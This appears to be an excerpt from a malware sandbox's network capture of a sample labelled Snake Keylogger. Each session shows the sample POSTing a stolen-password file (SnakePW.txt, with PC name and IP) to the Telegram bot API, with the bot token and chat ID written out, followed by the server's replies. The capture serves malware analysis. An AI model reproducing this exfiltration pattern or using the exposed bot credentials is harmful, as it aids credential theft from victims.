                            2022-06-26 07:32:42 UTC18OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 64 36 65 61 30 65 31 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756d6ea0e18Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:32:43 UTC19INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:32:43 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:32:43 UTC19INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 37 35 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 37 36 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66757,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228763,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            110192.168.2.549957149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:25 UTC185OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f0200579
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:25 UTC186OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 30 32 30 30 35 37 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f0200579Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:25 UTC186INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:25 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:25 UTC186INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 36 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66869,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228805,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            111192.168.2.549962149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:25 UTC187OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f0547b32
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:25 UTC187OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 30 35 34 37 62 33 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f0547b32Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:25 UTC188INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:25 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:25 UTC188INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66870,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228805,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            112192.168.2.549964149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:25 UTC189OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f09276e5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:25 UTC189OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 30 39 32 37 36 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f09276e5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:26 UTC189INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:26 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:26 UTC190INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66871,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228806,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            113192.168.2.549965149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:26 UTC190OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f0d07341
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:26 UTC191OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 30 64 30 37 33 34 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f0d07341Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:26 UTC191INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:26 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:26 UTC192INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66872,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228806,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            114192.168.2.549966149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:26 UTC192OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f10c111a
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:26 UTC192OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 31 30 63 31 31 31 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f10c111aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:26 UTC193INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:26 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:26 UTC193INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66873,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228806,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            115192.168.2.549967149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:26 UTC194OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f142e3e0
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:26 UTC194OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 31 34 32 65 33 65 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f142e3e0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:27 UTC195INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:33:27 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:33:27 UTC195INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 36 38 37 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 30 37 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":66874,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228807,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            116192.168.2.549968149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:33:27 UTC195OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5756f17e7ee5
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:33:27 UTC196OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 36 66 31 37 65 37 65 65 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5756f17e7ee5Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:33:27 UTC196INHTTP/1.1 200 OK
